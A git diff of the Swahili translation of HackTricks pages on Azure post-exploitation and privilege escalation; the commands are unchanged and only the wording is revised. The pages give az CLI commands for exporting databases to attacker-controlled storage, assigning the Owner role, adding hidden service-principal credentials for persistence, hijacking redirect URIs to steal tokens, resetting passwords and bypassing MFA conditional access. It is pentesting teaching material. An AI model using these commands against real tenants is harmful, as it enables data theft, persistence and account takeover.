kumbukumbu za ukaguzi zinaweza kuhifadhiwa. +Kwa ruhusa hii, unaweza kubadilisha au kuwezesha mipangilio ya ukaguzi kwenye Azure SQL Server. Hii inaweza kumruhusu mshambuliaji au mtumiaji aliyeidhinishwa kubadilisha usanidi wa ukaguzi, ambayo inaweza kufunika nyayo au kuelekeza kumbukumbu za ukaguzi kwenye eneo chini ya udhibiti wao. Hii inaweza kuzuia ufuatiliaji wa usalama au kuwezesha kuendelea kufuatilia vitendo. KUMBUKA: Ili kuwezesha ukaguzi kwa Azure SQL Server ukitumia Blob Storage, lazima uunganishe akaunti ya hifadhi ambapo kumbukumbu za ukaguzi zinaweza kuhifadhiwa. ```bash az sql server audit-policy update \ --server \ @@ -62,7 +62,7 @@ az sql server connection-policy update \ ``` ### "Microsoft.Sql/servers/databases/export/action" -Kwa ruhusa hii, unaweza kusafirisha hifadhidata kutoka kwa Azure SQL Server hadi akaunti ya hifadhi. Mshambuliaji au mtumiaji aliyeidhinishwa mwenye ruhusa hii anaweza kuhamasisha data nyeti kutoka kwenye hifadhidata kwa kuisafirisha hadi mahali wanayodhibiti, na kuleta hatari kubwa ya uvujaji wa data. Ni muhimu kujua funguo za hifadhi ili uweze kufanya hivi. +Kwa ruhusa hii, unaweza kusafirisha database kutoka kwa Azure SQL Server hadi akaunti ya hifadhi. Mshambuliaji au mtumiaji aliyeidhinishwa mwenye ruhusa hii anaweza kuhamasisha data nyeti kutoka kwa database kwa kuisafirisha hadi eneo wanadhibiti, na kuleta hatari kubwa ya uvunjaji wa data. Ni muhimu kujua funguo za hifadhi ili uweze kufanya hivi. ```bash az sql db export \ --server \ @@ -76,7 +76,7 @@ az sql db export \ ``` ### "Microsoft.Sql/servers/databases/import/action" -Kwa ruhusa hii, unaweza kuingiza hifadhidata kwenye Azure SQL Server. Mshambuliaji au mtumiaji aliyeidhinishwa mwenye ruhusa hii anaweza kuweza kupakia hifadhidata zenye madhara au zilizobadilishwa. Hii inaweza kusababisha kudhibiti data nyeti au kwa kuingiza scripts au triggers zenye madhara ndani ya hifadhidata iliyoungizwa. Zaidi ya hayo, unaweza kuingiza kwenye seva yako mwenyewe katika azure. Kumbuka: Seva lazima iruhusu huduma na rasilimali za Azure kufikia seva hiyo. +Kwa ruhusa hii, unaweza kuingiza database kwenye Azure SQL Server. Mshambuliaji au mtumiaji aliyeidhinishwa mwenye ruhusa hii anaweza kuhamasisha databases zenye madhara au zilizobadilishwa. Hii inaweza kusababisha kudhibiti data nyeti au kwa kuingiza scripts au triggers zenye madhara ndani ya database iliyounganishwa. Zaidi ya hayo, unaweza kuingiza kwenye seva yako mwenyewe katika azure. Kumbuka: Seva lazima iruhusu huduma na rasilimali za Azure kufikia seva hiyo. ```bash az sql db import --admin-user \ --admin-password \ diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md index 227d540ad..0cd91db78 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md @@ -4,7 +4,7 @@ ## Table Storage Post Exploitation -Kwa maelezo zaidi kuhusu table storage angalia: +Kwa maelezo zaidi kuhusu hifadhi ya meza angalia: {{#ref}} ../az-services/az-table-storage.md @@ -12,7 +12,7 @@ Kwa maelezo zaidi kuhusu table storage angalia: ### Microsoft.Storage/storageAccounts/tableServices/tables/entities/read -Mtu mwenye ruhusa hii ataweza **orodhesha** meza ndani ya table storage na **kusoma taarifa** ambazo zinaweza kuwa na **taarifa nyeti**. +Mtu mwenye ruhusa hii ataweza **orodhesha** meza ndani ya hifadhi ya meza na **kusoma taarifa** ambazo zinaweza kuwa na **taarifa nyeti**. ```bash # List tables az storage table list --auth-mode login --account-name @@ -55,6 +55,6 @@ az storage entity merge \ ``` ### \*/delete -Hii itaruhusu kufuta faili ndani ya mfumo wa faili wa pamoja ambao unaweza **kuingilia baadhi ya huduma** au kumfanya mteja **kupoteza taarifa muhimu**. +Hii itaruhusu kufuta faili ndani ya mfumo wa faili ulio shiriki ambao unaweza **kuingilia baadhi ya huduma** au kufanya mteja **kupoteza taarifa muhimu**. {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md index 4b72fdc9d..fda7a03dd 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md @@ -4,7 +4,7 @@ ## VMs & Network -Kwa maelezo zaidi kuhusu Azure VMs na mitandao angalia ukurasa ufuatao: +Kwa maelezo zaidi kuhusu Azure VMs na mtandao angalia ukurasa ufuatao: {{#ref}} ../az-services/vms/ @@ -12,7 +12,7 @@ Kwa maelezo zaidi kuhusu Azure VMs na mitandao angalia ukurasa ufuatao: ### VM Application Pivoting -Programu za VM zinaweza kushirikiwa na usajili na wapangaji wengine. Ikiwa programu inashirikiwa, huenda ni kwa sababu inatumika. Hivyo, ikiwa mshambuliaji anafanikiwa **kuharibu programu na kupakia toleo lililo na backdoor** inaweza kuwa inawezekana kwamba itatekelezwa **katika mpangaji au usajili mwingine**. +Programu za VM zinaweza kushirikiwa na usajili na wapangaji wengine. Ikiwa programu inashirikiwa inawezekana kwa sababu inatumika. Hivyo, ikiwa mshambuliaji anafanikiwa **kudhoofisha programu na kupakia toleo lililo na backdoor** inaweza kuwa inawezekana kwamba itatekelezwa **katika mpangaji au usajili mwingine**. ### Taarifa nyeti katika picha @@ -36,11 +36,11 @@ az sig image-version list \ --gallery-image-definition \ -o table ``` -2. **Orodha ya picha za kawaida** +2. **Orodha picha za kawaida** ```bash az image list -o table ``` -3. **Unda VM kutoka picha ID** na tafuta taarifa nyeti ndani yake +3. **Unda VM kutoka kwa picha ID** na tafuta taarifa nyeti ndani yake ```bash # Create VM from image az vm create \ @@ -61,21 +61,21 @@ az restore-point list \ --restore-point-collection-name \ -o table ``` -2. **Unda diski** kutoka kwa nukta ya kurejesha +2. **Unda diski** kutoka kwa alama ya kurejesha ```bash az disk create \ --resource-group \ --name \ --source /subscriptions//resourceGroups//providers/Microsoft.Compute/restorePointCollections//restorePoints/ ``` -3. **Unganisha diski kwa VM** (mshambuliaji anahitaji kuwa amepata udhibiti wa VM ndani ya akaunti tayari) +3. **Unganisha diski kwenye VM** (mshambuliaji anahitaji kuwa amepata udhibiti wa VM ndani ya akaunti tayari) ```bash az vm disk attach \ --resource-group \ --vm-name \ --name ``` -4. **Panda** diski na **tafuta taarifa nyeti** +4. **Pandisha** diski na **tafuta taarifa nyeti** {{#tabs }} {{#tab name="Linux" }} @@ -94,36 +94,36 @@ sudo mount /dev/sdX1 /mnt/mydisk {{#tab name="Windows" }} -#### **1. Fungua Usimamizi wa Diski** +#### **1. Fungua Usimamizi wa Disk** -1. Bonyeza kulia **Kuanza** na uchague **Usimamizi wa Diski**. -2. Diski iliyoambatanishwa inapaswa kuonekana kama **Offline** au **Isiyopangwa**. +1. Bonyeza kulia **Kuanza** na uchague **Usimamizi wa Disk**. +2. Disk iliyoambatanishwa inapaswa kuonekana kama **Offline** au **Isiyopangwa**. -#### **2. Leta Diski Mtandaoni** +#### **2. Leta Disk Mtandaoni** -1. Tafuta diski kwenye sehemu ya chini. -2. Bonyeza kulia diski (mfano, **Disk 1**) na uchague **Mtandaoni**. +1. Tafuta disk katika sehemu ya chini. +2. Bonyeza kulia disk (mfano, **Disk 1**) na uchague **Mtandaoni**. -#### **3. Anzisha Diski** +#### **3. Anzisha Disk** -1. Ikiwa diski haijaanzishwa, bonyeza kulia na uchague **Anzisha Diski**. +1. Ikiwa disk haijaanzishwa, bonyeza kulia na uchague **Anzisha Disk**. 2. Chagua mtindo wa sehemu: - **MBR** (Master Boot Record) au **GPT** (GUID Partition Table). GPT inapendekezwa kwa mifumo ya kisasa. #### **4. Unda Hifadhi Mpya** -1. Bonyeza kulia kwenye nafasi isiyopangwa kwenye diski na uchague **Hifadhi Mpya Rahisi**. +1. Bonyeza kulia nafasi isiyopangwa kwenye disk na uchague **Hifadhi Mpya Rahisi**. 2. Fuata msaidizi ili: - Kuweka herufi ya diski (mfano, `D:`). -- Fanya muundo wa diski (chagua NTFS kwa kesi nyingi). +- Fanya muundo wa disk (chagua NTFS kwa kesi nyingi). {{#endtab }} {{#endtabs }} -### Taarifa nyeti kwenye diski & picha za snapshot +### Taarifa nyeti katika disks & snapshots -Inaweza kuwa inawezekana kupata **taarifa nyeti ndani ya diski au hata picha za snapshot za zamani za diski**. +Inaweza kuwa inawezekana kupata **taarifa nyeti ndani ya disks au hata snapshots za zamani za disk**. -1. **Orodhesha picha za snapshot** +1. **Orodhesha snapshots** ```bash az snapshot list \ --resource-group \ @@ -137,13 +137,13 @@ az disk create \ --source \ --size-gb ``` -3. **Unganisha na kuunganisha diski** kwa VM na kutafuta taarifa nyeti (angalia sehemu iliyopita kuona jinsi ya kufanya hivyo) +3. **Unganisha na kuunganisha diski** kwa VM na tafuta taarifa nyeti (angalia sehemu iliyopita kuona jinsi ya kufanya hivi) -### Taarifa nyeti katika VM Extensions & VM Applications +### Taarifa nyeti katika Mipanuzi ya VM & Maombi ya VM -Inaweza kuwa inawezekana kupata **taarifa nyeti ndani ya VM extensions na VM applications**. +Inaweza kuwa inawezekana kupata **taarifa nyeti ndani ya mipanuzi ya VM na maombi ya VM**. -1. **Orodhesha programu zote za VM** +1. **Orodhesha maombi yote ya VM** ```bash ## List all VM applications inside a gallery az sig gallery-application list --gallery-name --resource-group --output table diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/README.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/README.md index 3e45f0680..391a220ab 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/README.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/README.md @@ -1 +1 @@ -# Az - Privilege Escalation +# Az - Kuinua Haki diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md index ac1c0fd8c..de640ca4a 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md @@ -19,7 +19,7 @@ Ruhusa hizi zinaruhusu kuita amri zifuatazo kupata **SSH shell** ndani ya progra # Direct option az webapp ssh --name --resource-group ``` -- Unda tunnel kisha uungane na SSH: +- Unda tunnel kisha unganisha na SSH: ```bash az webapp create-remote-connection --name --resource-group diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md index 7f99693f4..d2b8dac87 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md @@ -21,7 +21,7 @@ az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e55 Ruhusa hii inaruhusu kubadilisha ruhusa zilizotolewa na jukumu, ikimruhusu mshambuliaji kupandisha hadhi kwa kutoa ruhusa zaidi kwa jukumu aliloteua. -Create the file `role.json` with the following **content**: +Unda faili `role.json` yenye **maudhui** yafuatayo: ```json { "Name": "", @@ -40,7 +40,7 @@ az role definition update --role-definition role.json ``` ### Microsoft.Authorization/elevateAccess/action -Hii ruhusa inaruhusu kuinua mamlaka na kuwa na uwezo wa kutoa ruhusa kwa mtu yeyote kwa rasilimali za Azure. Imepangwa kutolewa kwa Wasimamizi wa Kimataifa wa Entra ID ili waweze pia kusimamia ruhusa juu ya rasilimali za Azure. +Ruhusa hizi zinaruhusu kuinua mamlaka na kuwa na uwezo wa kutoa ruhusa kwa mtu yeyote kwa rasilimali za Azure. Imeandaliwa kutolewa kwa Wasimamizi wa Kimataifa wa Entra ID ili waweze pia kusimamia ruhusa juu ya rasilimali za Azure. > [!TIP] > Nadhani mtumiaji anahitaji kuwa Msimamizi wa Kimataifa katika Entra ID ili simu ya kuinua ifanye kazi. @@ -53,7 +53,7 @@ az role assignment create --assignee "" --role "Owner" --scope "/" ``` ### Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write -Ruhusa hii inaruhusu kuongeza akreditivu za Shirikisho kwa utambulisho unaosimamiwa. Mfano, kutoa ufikiaji kwa Github Actions katika repo kwa utambulisho unaosimamiwa. Kisha, inaruhusu **kufikia utambulisho wowote ulioainishwa na mtumiaji**. +Ruhusa hii inaruhusu kuongeza akreditivu za Shirikisho kwa utambulisho unaosimamiwa. Mfano, kutoa ufikiaji kwa Github Actions katika repo kwa utambulisho unaosimamiwa. Kisha, inaruhusu **kufikia utambulisho wowote unaosimamiwa ulioelezwa na mtumiaji**. Mfano wa amri ya kutoa ufikiaji kwa repo katika Github kwa utambulisho unaosimamiwa: ```bash diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md index 8c4f0bb3f..4513c8b31 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md @@ -9,7 +9,7 @@ ### Jukumu: Msimamizi wa Jukumu la Kipekee -Jukumu hili lina ruhusa za granular zinazohitajika ili kuweza kupeana majukumu kwa wakuu na kutoa ruhusa zaidi kwa majukumu. Vitendo vyote viwili vinaweza kutumika vibaya ili kupandisha hadhi. +Jukumu hili lina ruhusa za granular zinazohitajika ili kuweza kutoa majukumu kwa wakuu na kutoa ruhusa zaidi kwa majukumu. Vitendo vyote viwili vinaweza kutumika vibaya ili kupandisha hadhi. - Peana jukumu kwa mtumiaji: ```bash @@ -48,11 +48,11 @@ az rest --method PATCH \ ] }' ``` -## Applications +## Maombi ### `microsoft.directory/applications/credentials/update` -Hii inaruhusu mshambuliaji **kuongeza akreditivu** (nenosiri au vyeti) kwa programu zilizopo. Ikiwa programu ina ruhusa za kipaumbele, mshambuliaji anaweza kuthibitisha kama programu hiyo na kupata ruhusa hizo. +Hii inaruhusu mshambuliaji **kuongeza akidi** (nenosiri au vyeti) kwa maombi yaliyopo. Ikiwa ombi lina ruhusa za kipaumbele, mshambuliaji anaweza kuthibitisha kama ombi hilo na kupata ruhusa hizo. ```bash # Generate a new password without overwritting old ones az ad app credential reset --id --append @@ -67,7 +67,7 @@ az ad app credential reset --id --append ``` ### `microsoft.directory/applications/owners/update` -Kwa kujiongeza kama mmiliki, mshambuliaji anaweza kudhibiti programu, ikiwa ni pamoja na akiba na ruhusa. +Kwa kujiongeza kama mmiliki, mshambuliaji anaweza kubadilisha programu, ikiwa ni pamoja na akiba na ruhusa. ```bash az ad app owner add --id --owner-object-id az ad app credential reset --id --append @@ -77,9 +77,9 @@ az ad app owner list --id ``` ### `microsoft.directory/applications/allProperties/update` -Mshambuliaji anaweza kuongeza URI ya kuelekeza kwa programu zinazotumiwa na watumiaji wa mpangilio na kisha kushiriki nao URL za kuingia zinazotumia URL mpya ya kuelekeza ili kuiba token zao. Kumbuka kwamba ikiwa mtumiaji tayari alikuwa amejiingiza kwenye programu, uthibitishaji utaenda kiotomatiki bila mtumiaji kuhitaji kukubali chochote. +Mshambuliaji anaweza kuongeza URI ya kuelekeza kwa programu zinazotumiwa na watumiaji wa mpangilio na kisha kushiriki nao URL za kuingia zinazotumia URL mpya ya kuelekeza ili kuiba token zao. Kumbuka kwamba ikiwa mtumiaji tayari alikuwa amejiunga na programu, uthibitishaji utaenda kiotomatiki bila mtumiaji kuhitaji kukubali chochote. -Kumbuka pia kwamba inawezekana kubadilisha ruhusa ambazo programu inazihitaji ili kupata ruhusa zaidi, lakini katika kesi hii mtumiaji atahitaji kukubali tena ombi linalouliza ruhusa zote. +Kumbuka kwamba pia inawezekana kubadilisha ruhusa ambazo programu inazitaka ili kupata ruhusa zaidi, lakini katika kesi hii mtumiaji atahitaji kukubali tena ombi linalouliza ruhusa zote. ```bash # Get current redirect uris az ad app show --id ea693289-78f3-40c6-b775-feabd8bef32f --query "web.redirectUris" @@ -95,10 +95,10 @@ Hii inaruhusu mshambuliaji kuongeza akidi kwa huduma zilizopo. Ikiwa huduma hiyo az ad sp credential reset --id --append ``` > [!CAUTION] -> Nenosiri mpya ulioanzishwa hautaonekana kwenye konsoli ya wavuti, hivyo hii inaweza kuwa njia ya siri ya kudumisha uvumilivu juu ya huduma ya msingi.\ -> Kutoka kwenye API wanaweza kupatikana kwa: `az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json` +> Nywila mpya iliyoundwa haitonekana kwenye console ya wavuti, hivyo hii inaweza kuwa njia ya siri ya kudumisha uthibitisho juu ya huduma ya msingi.\ +> Kutoka kwenye API zinaweza kupatikana kwa: `az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json` -Ikiwa unapata kosa `"code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid."` ni kwa sababu **haiwezekani kubadilisha mali ya passwordCredentials** ya SP na kwanza unahitaji kuifungua. Kwa hiyo unahitaji ruhusa (`microsoft.directory/applications/allProperties/update`) inayokuruhusu kutekeleza: +Ikiwa unapata kosa `"code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid."` ni kwa sababu **haiwezekani kubadilisha mali ya passwordCredentials** ya SP na kwanza unahitaji kuifungua. Ili kufanya hivyo unahitaji ruhusa (`microsoft.directory/applications/allProperties/update`) inayokuruhusu kutekeleza: ```bash az rest --method PATCH --url https://graph.microsoft.com/v1.0/applications/ --body '{"servicePrincipalLockConfiguration": null}' ``` @@ -110,7 +110,7 @@ az ad sp credential reset --id --append ``` ### `microsoft.directory/servicePrincipals/owners/update` -Kama ilivyo kwa maombi, ruhusa hii inaruhusu kuongeza wamiliki zaidi kwa huduma ya msingi. Kumiliki huduma ya msingi kunaruhusu kudhibiti akidi zake na ruhusa. +Kama ilivyo kwa programu, ruhusa hii inaruhusu kuongeza wamiliki zaidi kwa huduma ya msingi. Kumiliki huduma ya msingi kunaruhusu kudhibiti hati zake na ruhusa. ```bash # Add new owner spId="" @@ -130,7 +130,7 @@ az ad sp owner list --id > [!CAUTION] > Baada ya kuongeza mmiliki mpya, nilijaribu kuondoa lakini API ilijibu kwamba njia ya DELETE haikupatikana, hata kama ndiyo njia unahitaji kutumia kuondoa mmiliki. Hivyo huwezi kuondoa wamiliki siku hizi. -### `microsoft.directory/servicePrincipals/disable` and `enable` +### `microsoft.directory/servicePrincipals/disable` na `enable` Hizi ruhusa zinaruhusu kuzima na kuwezesha wahusika wa huduma. Mshambuliaji anaweza kutumia ruhusa hii kuwezesha mhusika wa huduma ambaye anaweza kupata ufikiaji wa namna fulani ili kupandisha hadhi. @@ -144,7 +144,7 @@ az ad sp update --id --account-enabled true ``` #### `microsoft.directory/servicePrincipals/getPasswordSingleSignOnCredentials` & `microsoft.directory/servicePrincipals/managePasswordSingleSignOnCredentials` -Hizi ruhusa zinaruhusu kuunda na kupata akreditivu za kuingia mara moja ambazo zinaweza kuruhusu ufikiaji wa programu za upande wa tatu. +Ruhusa hizi zinaruhusu kuunda na kupata akreditivu za kuingia mara moja ambazo zinaweza kuruhusu ufikiaji wa programu za upande wa tatu. ```bash # Generate SSO creds for a user or a group spID="" @@ -166,11 +166,11 @@ az rest --method POST \ ``` --- -## Groups +## Makundi ### `microsoft.directory/groups/allProperties/update` -Ruhusa hii inaruhusu kuongeza watumiaji kwenye vikundi vyenye mamlaka, na kusababisha kupanda kwa mamlaka. +Ruhusa hii inaruhusu kuongeza watumiaji kwenye makundi yenye mamlaka, na kusababisha kupanda kwa mamlaka. ```bash az ad group member add --group --member-id ``` @@ -187,7 +187,7 @@ az ad group member add --group --member-id ### `microsoft.directory/groups/members/update` -Ruhusa hii inaruhusu kuongeza wanachama kwenye kundi. Mshambuliaji anaweza kujiongeza au akaunti mbaya kwenye vikundi vyenye mamlaka ambayo yanaweza kutoa ufikiaji wa juu. +Ruhusa hii inaruhusu kuongeza wanachama kwenye kundi. Mshambuliaji anaweza kujiongeza mwenyewe au akaunti mbaya kwenye vikundi vyenye mamlaka ambavyo vinaweza kutoa ufikiaji wa juu. ```bash az ad group member add --group --member-id ``` @@ -206,7 +206,7 @@ az rest --method PATCH \ ``` **Kumbuka**: Ruhusa hii inatenga vikundi vya Entra ID vinavyoweza kupewa majukumu. -### Privesc ya Vikundi vya Kijadi +### Privesc za Vikundi vya Kijadi Inaweza kuwa inawezekana kwa watumiaji kuongeza mamlaka kwa kubadilisha mali zao wenyewe ili kuongezwa kama wanachama wa vikundi vya kijadi. Kwa maelezo zaidi angalia: @@ -218,13 +218,13 @@ dynamic-groups.md ### `microsoft.directory/users/password/update` -Ruhusa hii inaruhusu kurekebisha nywila kwa watumiaji wasiokuwa wasimamizi, ikiruhusu mshambuliaji mwenye uwezo kuongeza mamlaka kwa watumiaji wengine. Ruhusa hii haiwezi kutolewa kwa majukumu maalum. +Ruhusa hii inaruhusu kurekebisha nenosiri kwa watumiaji wasiokuwa wasimamizi, ikiruhusu mshambuliaji mwenye uwezo kuongeza mamlaka kwa watumiaji wengine. Ruhusa hii haiwezi kutolewa kwa majukumu maalum. ```bash az ad user update --id --password "kweoifuh.234" ``` ### `microsoft.directory/users/basic/update` -Hii haki inaruhusu kubadilisha mali za mtumiaji. Ni kawaida kukutana na vikundi vya dinamik ambayo vinaongeza watumiaji kulingana na thamani za mali, kwa hivyo, ruhusa hii inaweza kumruhusu mtumiaji kuweka thamani ya mali inayohitajika ili kuwa mwanachama wa kundi maalum la dinamik na kupandisha haki. +Hii ruhusa inaruhusu kubadilisha mali za mtumiaji. Ni kawaida kukutana na vikundi vya dinamik ambayo vinaongeza watumiaji kulingana na thamani za mali, kwa hivyo, ruhusa hii inaweza kumruhusu mtumiaji kuweka thamani ya mali inayohitajika ili kuwa mwanachama wa kundi maalum la dinamik na kupandisha mamlaka. ```bash #e.g. change manager of a user victimUser="" diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md index 02d5c6d1c..cce91f980 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md @@ -1,4 +1,4 @@ -# Az - Sera za Ufikiaji wa Masharti & MFA Bypass +# Az - Sera za Ufikiaji wa Masharti & Bypass ya MFA {{#include ../../../../banners/hacktricks-training.md}} @@ -10,26 +10,26 @@ Sera za ufikiaji wa masharti kimsingi **zinaelezea** **Nani** anaweza kufikia ** Hapa kuna mifano kadhaa: 1. **Sera ya Hatari ya Kuingia**: Sera hii inaweza kuwekwa ili kuhitaji uthibitisho wa hatua nyingi (MFA) wakati hatari ya kuingia inagundulika. Kwa mfano, ikiwa tabia ya kuingia ya mtumiaji ni ya ajabu ikilinganishwa na muundo wao wa kawaida, kama kuingia kutoka nchi tofauti, mfumo unaweza kuomba uthibitisho wa ziada. -2. **Sera ya Uzingatiaji wa Kifaa**: Sera hii inaweza kuzuia ufikiaji wa huduma za Azure tu kwa vifaa ambavyo vinakidhi viwango vya usalama vya shirika. Kwa mfano, ufikiaji unaweza kuruhusiwa tu kutoka kwa vifaa ambavyo vina programu ya antivirus iliyo na sasisho au vinatumia toleo fulani la mfumo wa uendeshaji. +2. **Sera ya Uzingatiaji wa Kifaa**: Sera hii inaweza kuzuia ufikiaji wa huduma za Azure tu kwa vifaa vinavyokidhi viwango vya usalama vya shirika. Kwa mfano, ufikiaji unaweza kuruhusiwa tu kutoka kwa vifaa vilivyo na programu ya antivirus iliyo na sasisho au vinavyotumia toleo fulani la mfumo wa uendeshaji. -## Mipango ya Kuzuia Sera za Ufikiaji wa Masharti +## Bypass za Sera za Ufikiaji wa Masharti -Inawezekana kwamba sera ya ufikiaji wa masharti **inaangalia taarifa fulani ambazo zinaweza kubadilishwa kwa urahisi kuruhusu kuondoa sera hiyo**. Na ikiwa kwa mfano sera hiyo ilikuwa inakamilisha MFA, mshambuliaji ataweza kuipita. +Inawezekana kwamba sera ya ufikiaji wa masharti **inaangalia taarifa ambazo zinaweza kubadilishwa kwa urahisi kuruhusu bypass ya sera**. Na ikiwa kwa mfano sera ilikuwa inakamilisha MFA, mshambuliaji ataweza kuipita. -Wakati wa kuunda sera ya ufikiaji wa masharti, inahitajika kuonyesha **watumiaji** walioathiriwa na **rasilimali za lengo** (kama programu zote za wingu). +Wakati wa kuunda sera ya ufikiaji wa masharti inahitajika kuashiria **watumiaji** walioathirika na **rasilimali za lengo** (kama programu zote za wingu). -Inahitajika pia kuunda **masharti** ambayo yatakuwa **yanasababisha** sera hiyo: +Pia inahitajika kuunda **masharti** ambayo yatakuwa **yanasababisha** sera: - **Mtandao**: Ip, anuwai za IP na maeneo ya kijiografia - Inaweza kupitishwa kwa kutumia VPN au Proxy kuungana na nchi au kufanikiwa kuingia kutoka anwani ya IP iliyoidhinishwa - **Hatari za Microsoft**: Hatari ya mtumiaji, hatari ya kuingia, hatari ya ndani -- **Majukwaa ya Vifaa**: Kifaa chochote au kuchagua Android, iOS, Windows phone, Windows, macOS, Linux -- Ikiwa “Kifaa chochote” hakijachaguliwa lakini chaguo zingine zote zimechaguliwa, inawezekana kupita kwa kutumia user-agent wa nasibu usiokuwa na uhusiano na majukwaa hayo -- **Programu za Wateja**: Chaguo ni “Kivinjari”, “Programu za Simu na wateja wa desktop”, “Wateja wa Exchange ActiveSync” na Wateja Wengine” +- **Majukwaa ya vifaa**: Kifaa chochote au chagua Android, iOS, Windows phone, Windows, macOS, Linux +- Ikiwa “Kifaa chochote” hakijachaguliwa lakini chaguo zingine zote zimechaguliwa inawezekana kupita kwa kutumia user-agent isiyo ya kawaida isiyohusiana na majukwaa hayo +- **Programu za mteja**: Chaguo ni “Kivinjari”, “Programu za simu na wateja wa desktop”, “Wateja wa Exchange ActiveSync” na Wateja Wengine” - Ili kupita kuingia na chaguo kisichochaguliwa -- **Kichujio kwa vifaa**: Inawezekana kuunda sheria inayohusiana na kifaa kilichotumika -- **Mchakato wa Uthibitishaji**: Chaguo ni “Mchakato wa nambari ya kifaa” na “Uhamisho wa Uthibitishaji” -- Hii haitamathirisha mshambuliaji isipokuwa anajaribu kutumia mojawapo ya protokali hizo katika jaribio la uvuvi kuingia kwenye akaunti ya mwathirika +- **Filter kwa vifaa**: Inawezekana kuunda sheria inayohusiana na kifaa kilichotumika +- **Mchakato wa uthibitishaji**: Chaguo ni “Mchakato wa nambari ya kifaa” na “Uhamisho wa uthibitishaji” +- Hii haitamathirisha mshambuliaji isipokuwa anajaribu kutumia mojawapo ya protokali hizo katika jaribio la phishing kuingia kwenye akaunti ya mwathirika Matokeo yanayoweza kutokea ni: Zuia au Ruhusu ufikiaji na masharti yanayoweza kama kuhitaji MFA, kifaa kuwa na uzingatiaji... @@ -48,7 +48,7 @@ Unaweza kubadilisha user agent **kwa mikono** katika zana za maendeleo: ### Mikoa: Nchi, anuwai za IP - Hali ya Kifaa -Ikiwa hii imewekwa katika sera ya masharti, mshambuliaji anaweza tu kutumia **VPN** katika **nchi iliyoidhinishwa** au kujaribu kutafuta njia ya kufikia kutoka **anwani ya IP iliyoidhinishwa** ili kupita masharti haya. +Ikiwa hii imewekwa katika sera ya masharti, mshambuliaji anaweza tu kutumia **VPN** katika **nchi iliyoidhinishwa** au kujaribu kupata njia ya kufikia kutoka **anwani ya IP iliyoidhinishwa** ili kupita masharti haya. ### Programu za Wingu @@ -57,7 +57,7 @@ Inawezekana kuunda **sera za ufikiaji wa masharti kuzuia au kulazimisha** kwa mf
Ili kujaribu kupita ulinzi huu unapaswa kuona ikiwa unaweza **kuingia tu katika programu yoyote**.\ -Zana [**AzureAppsSweep**](https://github.com/carlospolop/AzureAppsSweep) ina **IDs za programu kumi za programu zilizowekwa** na itajaribu kuingia ndani yao na kukujulisha na hata kukupa token ikiwa ni mafanikio. +Zana [**AzureAppsSweep**](https://github.com/carlospolop/AzureAppsSweep) ina **IDs za programu kumi** zilizowekwa na itajaribu kuingia ndani yao na kukujulisha na hata kukupa token ikiwa itafanikiwa. Ili **kujaribu IDs za programu maalum katika rasilimali maalum** unaweza pia kutumia zana kama: ```bash @@ -65,26 +65,26 @@ roadrecon auth -u user@email.com -r https://outlook.office.com/ -c 1fec8e78-bce4 ``` -Moreover, ni muhimu pia kulinda njia ya kuingia (kwa mfano, ikiwa unajaribu kuingia kutoka kwa kivinjari au kutoka kwa programu ya desktop). Chombo [**Invoke-MFASweep**](az-conditional-access-policies-mfa-bypass.md#invoke-mfasweep) hufanya baadhi ya ukaguzi ili kujaribu kupita hizi ulinzi pia. +Zaidi ya hayo, inawezekana pia kulinda njia ya kuingia (kwa mfano, ikiwa unajaribu kuingia kutoka kwa kivinjari au kutoka kwa programu ya desktop). Chombo [**Invoke-MFASweep**](az-conditional-access-policies-mfa-bypass.md#invoke-mfasweep) hufanya baadhi ya ukaguzi ili kujaribu kupita hizi ulinzi pia. 